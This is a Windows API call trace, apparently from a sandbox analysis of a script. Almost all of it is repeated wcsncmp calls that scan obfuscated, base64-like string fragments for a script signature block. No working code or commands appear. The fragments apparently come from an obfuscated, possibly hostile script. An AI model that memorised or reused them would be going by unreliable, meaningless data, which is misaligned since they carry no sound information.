	[0058.527] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.527] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0058.527] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.527] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.527] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.527] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0058.527] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.527] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0058.527] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0058.527] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.527] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0058.528] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0058.528] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.528] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0058.528] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0058.528] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.528] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.528] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.528] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0058.528] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.528] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.528] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0058.528] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0058.528] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0058.528] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0058.528] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0058.528] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.528] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0058.528] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0058.528] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.528] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0058.528] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.528] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.528] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.528] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.528] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.528] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0058.528] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0058.528] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0058.528] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.528] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0058.528] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.528] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.528] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0058.528] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.528] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.529] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0058.529] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0058.529] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0058.529] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.529] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.529] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.529] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.529] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0058.529] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.529] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0058.529] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0058.529] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.529] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.529] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0058.529] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0058.529] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0058.529] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0058.529] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.529] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.529] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0058.529] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.529] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.529] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.529] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.529] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0058.529] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0058.529] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.529] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0058.529] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.529] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.529] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.529] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0058.529] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0058.529] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.529] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0058.530] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0058.530] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.530] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.530] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0058.530] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0058.530] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.530] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.530] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.530] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.530] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.530] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.530] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0058.530] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0058.530] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.530] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.530] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.530] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0058.530] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0058.530] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.530] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0058.530] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.530] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.530] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0058.530] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.530] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0058.530] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0058.530] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.530] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0058.530] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0058.530] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.530] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.530] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.530] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.530] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.530] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.531] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.531] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0058.531] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.531] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0058.531] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.531] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.531] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0058.531] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.531] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.531] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0058.531] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.531] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0058.531] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0058.531] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.531] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0058.531] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0058.531] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0058.531] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0058.531] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.531] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.531] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.531] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.531] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.531] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.531] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0058.531] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.531] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0058.531] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0058.531] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0058.531] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.531] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0058.531] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0058.531] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.531] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.532] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0058.532] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0058.532] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0058.532] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0058.532] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0058.532] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.532] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.532] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0058.532] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.532] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.532] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0058.532] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.532] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0058.532] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0058.532] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0058.532] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0058.532] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0058.532] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.532] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.532] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0058.532] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0058.532] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0058.532] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0058.532] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.533] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0058.534] CloseCodeAuthzLevel () returned 0x1
	[0058.534] FreeLibrary (hLibModule=0x7fefd710000) returned 1
